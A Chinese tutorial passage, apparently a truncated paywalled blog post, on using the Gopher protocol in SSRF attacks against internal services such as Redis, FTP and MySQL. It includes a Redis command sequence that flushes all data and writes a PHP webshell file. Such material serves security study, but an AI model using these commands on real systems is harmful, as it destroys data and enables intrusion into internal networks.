有时候有些漏洞不存在与Get请求中,此时Header CRLF方法就不行了,下面给出第二种方式
Gopher协议支持发出GET、POST请求:可以先拦截get请求包和post请求包,再构造成符合Gopher协议的请求(利用BP)。gopher协议是ssrf利用中一个最强大的协议。
可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求,还可以攻击内网未授权MySQL。
gopher 协议的精髓就在于可以在特定的端口上进行相关命令的执行。
Gopher协议的优势在于可以发送多种格式的数据包,这是就存在很大的利用空间。
gopher协议+ curl命令伪造POST请求包发给内网主机(已经扫到)。
gopher://IP:port/_{TCP/IP data stream}
redis.cmd文件为需要执行的redis命令,一行一条命令(写入换行符)
例如下列操作
flushall
config set dir /tmp
config set dbfilename shell.php
set 'webshell' '<?php phpinfo();?>'
save
转换

本文介绍如何使用Gopher协议进行SSRF攻击,包括构造GET和POST请求来攻击内网服务如FTP、Telnet等,并演示了利用curl命令伪造POST请求的具体过程。
最低0.47元/天 解锁文章
5万+

被折叠的 条评论
为什么被折叠?



